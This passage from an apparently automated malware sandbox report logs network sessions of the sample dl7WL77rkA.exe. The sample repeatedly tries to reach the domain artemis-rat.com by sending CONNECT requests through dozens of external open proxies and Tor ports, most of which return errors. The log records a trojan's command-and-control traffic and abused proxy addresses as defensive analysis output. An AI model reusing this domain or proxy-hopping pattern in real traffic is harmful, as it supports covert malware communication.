                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.523741961 CET316INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:39 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            456192.168.2.551449172.67.219.60803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.368940115 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.530021906 CET316INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:39 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            457192.168.2.551435104.24.35.152803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.369920015 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.530159950 CET316INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:39 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            458192.168.2.55132524.249.199.1241453876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.370881081 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            459192.168.2.55121249.228.131.16950003876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.371037006 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:39.764954090 CET | 340 | IN | HTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: nginx/1.12.2
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:38 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                            Content-Length: 173
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.12.2</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            460192.168.2.551431104.20.198.49803876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:39.371454000 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:39.530895948 CET | 316 | IN | HTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:39 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            461192.168.2.55132972.195.34.35273603876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:39.371751070 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            462192.168.2.551434104.238.111.10754843876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:39.371962070 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:39.842303991 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:40.373660088 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:41.592550993 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:43.702332973 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:45.889717102 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            463192.168.2.551328184.178.172.18152803876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:39.372113943 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            464192.168.2.551402129.213.150.20580803876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:39.372360945 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:39.608468056 CET | 59 | IN | HTTP/1.1 200 Connection Established
                                                                                                                                                                                                                                                            Proxy-agent: nginx


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            465192.168.2.55114061.133.66.6990023876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:39.372437954 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:39.822459936 CET | 311 | IN | HTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:39 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 166
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            466192.168.2.551456162.159.242.104803876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:39.373198032 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:39.534208059 CET | 316 | IN | HTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:39 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
467 | 192.168.2.5 | 51442 | 204.236.176.61 | 80 | 3876 | C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:39.373984098 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:39.547986984 CET | 116 | IN | HTTP/1.1 200 OK
Date: Mon, 11 Mar 2024 02:30:39 GMT
Server: nginx
Content-Type: text/plain
Content-Length: 0
Mar 11, 2024 03:30:39.554416895 CET | 177 | OUT | (binary data)
Mar 11, 2024 03:30:39.728137016 CET | 1079 | IN | (binary data)
Mar 11, 2024 03:30:39.730441093 CET | 93 | OUT | (binary data)
Mar 11, 2024 03:30:39.903244972 CET | 51 | IN | (binary data)


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
468 | 192.168.2.5 | 51377 | 38.162.19.123 | 3128 | 3876 | C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:39.374042988 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:41.784830093 CET | 111 | IN | HTTP/1.1 407 Proxy Authentication Required
Proxy-Authenticate: Basic realm=""
Data Raw: 50 72 6f 78 79 20 41 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 20 52 65 71 75 69 72 65 64
Data Ascii: Proxy Authentication Required


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
469 | 192.168.2.5 | 51258 | 78.30.128.10 | 8080 | 3876 | C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:39.376601934 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:39.711673021 CET | 340 | IN | HTTP/1.1 400 Bad Request
Server: nginx/1.12.2
Date: Mon, 11 Mar 2024 02:30:39 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 173
Connection: close
Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.12.2</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
470 | 192.168.2.5 | 51359 | 72.195.114.169 | 4145 | 3876 | C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:39.377378941 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
471 | 192.168.2.5 | 51419 | 12.186.205.121 | 80 | 3876 | C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:39.378823042 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
472 | 192.168.2.5 | 51482 | 172.67.182.150 | 80 | 3876 | C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:39.378825903 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:39.534066916 CET | 316 | IN | HTTP/1.1 400 Bad Request
Server: cloudflare
Date: Mon, 11 Mar 2024 02:30:39 GMT
Content-Type: text/html
Content-Length: 155
Connection: close
CF-RAY: -
Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            473192.168.2.551453162.214.154.177322103876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.384094000 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:39.842355967 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:40.386646986 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:41.514904976 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:43.811414957 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:46.014738083 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:48.202305079 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:52.508985996 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:31:01.205282927 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                                                                                                            474192.168.2.551172218.57.210.18690023876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:39.386538029 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:39.836564064 CET | 311 | IN | HTTP/1.1 400 Bad Request
Server: nginx
Date: Mon, 11 Mar 2024 02:13:06 GMT
Content-Type: text/html
Content-Length: 166
Connection: close
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                                                                                                            475192.168.2.551297121.182.138.71803876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:39.387923956 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:39.687503099 CET | 340 | IN | HTTP/1.1 400 Bad Request
Server: nginx/1.12.2
Date: Mon, 11 Mar 2024 02:30:39 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 173
Connection: close
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.12.2</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                                                                                                            476192.168.2.55040870.166.167.38577283876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:39.414202929 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                                                                                                            477192.168.2.551324220.134.221.7611313876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:39.419703007 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:31:01.024126053 CET | 729 | IN | HTTP/1.0 501 Tor is not an HTTP Proxy
Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>This is a SOCKS Proxy, Not An HTTP Proxy</title></head><body><h1>This is a SOCKs proxy, not an HTTP proxy.</h1><p>It appears you have configured your web browser to use this Tor port asan HTTP proxy.</p><p>This is not correct: This port is configured as a SOCKS proxy, notan HTTP proxy. If you need an HTTP proxy tunnel, use the HTTPTunnelPortconfiguration option in place of, or in addition to, SOCKSPort.Please configure your client accordingly.</p><p>See <a href="https://www.torproject.org/documentation.html">https://www.torproject.org/documentation.html</a> for more information.</p></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                                                                                                            478192.168.2.55038551.158.79.76163793876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:39.419845104 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:41.751872063 CET | 536 | IN | HTTP/1.0 501 Tor is not an HTTP Proxy
Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>This is a SOCKS Proxy, Not An HTTP Proxy</title></head><body><h1>This is a SOCKs proxy, not an HTTP proxy.</h1><p>It appears you have configured your web browser to use this Tor port asan HTTP proxy.</p><p>This is not correct: This port is configured as a SOCKS proxy, notan HTTP proxy. If you need an HTTP proxy tunnel, use the HTTPTunnelPortconfiguration option in place of, or in addition to, SOCKSPort.Please confi


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                                                                                                            479192.168.2.55134813.37.89.20131283876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.421647072 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.721189022 CET116INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:39 GMT
                                                                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                                                                            Content-Type: text/plain
                                                                                                                                                                                                                                                            Content-Length: 0


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            480192.168.2.55146852.189.35.880003876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.421782017 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.624021053 CET176INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                            Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:39 GMT
                                                                                                                                                                                                                                                            Content-Length: 19
                                                                                                                                                                                                                                                            Data Raw: 34 30 34 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 0a
                                                                                                                                                                                                                                                            Data Ascii: 404 page not found


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            481192.168.2.55135138.41.27.150112013876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
